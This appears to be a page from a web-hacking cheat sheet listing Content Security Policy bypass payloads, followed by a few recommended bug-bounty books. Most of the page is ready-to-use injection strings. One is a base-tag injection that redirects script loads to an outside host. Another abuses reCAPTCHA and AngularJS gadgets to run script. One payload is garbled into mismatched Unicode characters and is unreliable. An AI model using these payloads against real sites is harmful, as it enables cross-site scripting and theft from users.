CSP Bypass
CSP Evaluator
CSP Bypass
Weak CSP Bypass
1'"--><Base Href=//X55.is?
Credits: @KN0X55
CSP Bypass for gstatic
<ππππππ πππ='//π π π .πππππππ.πππ/πππππππππ/πππππ/ππ/ππππ.πππ.ππ'></ππππππ><πππππ ππ=π‘ ππ-πππππ=$πππππ.πππππππππΏπππ()|ππππππ±π’:'(π£=πππππ)(π·)'>
Nuclei Templates
Recaptcha Abuse

<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>
<img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>
Form Hijacking to bypass CSP
Resources
Interesting Books
Interesting BooksThe Web Application Hackerβs Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Last updated